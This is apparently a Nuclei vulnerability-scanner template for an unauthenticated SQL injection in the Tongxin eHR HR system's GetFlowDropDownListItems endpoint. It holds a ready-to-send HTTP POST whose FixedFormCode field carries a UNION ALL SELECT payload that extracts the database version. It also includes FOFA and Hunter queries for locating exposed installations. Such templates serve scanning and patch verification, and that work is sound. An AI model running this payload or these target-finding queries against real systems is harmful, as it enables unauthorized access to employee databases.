id: tx-ehr-GetFlowDropDownListItems-sqli
info:
  name: 同鑫 eHR 人力资源管理系统 GetFlowDropDownListItems - sqli
  author: leadlife
  severity: high
  description: 同鑫eHR人力资源管理系统 GetFlowDropDownListItems 接口存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息。
  reference: 
    - https://github.com/wy876/POC/blob/main/%E5%90%8C%E9%91%ABeHR/%E5%90%8C%E9%91%ABeHR%E4%BA%BA%E5%8A%9B%E8%B5%84%E6%BA%90%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9FGetFlowDropDownListItems%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    fofa-query: body="/TX.CDN"
    hunter-query: web.body=""/TX.CDN""
  tags: tx,sqli,ehr

http:
  - raw:
      - |
        POST /Common/GetFlowDropDownListItems HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Connection: close
        Content-Type: application/x-www-form-urlencoded; charset=utf-8
        
        FixedFormCode=1%27%20UNION%20ALL%20SELECT%20NULL%2C@@VERSION--

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body,'Microsoft','SQL')
        condition: and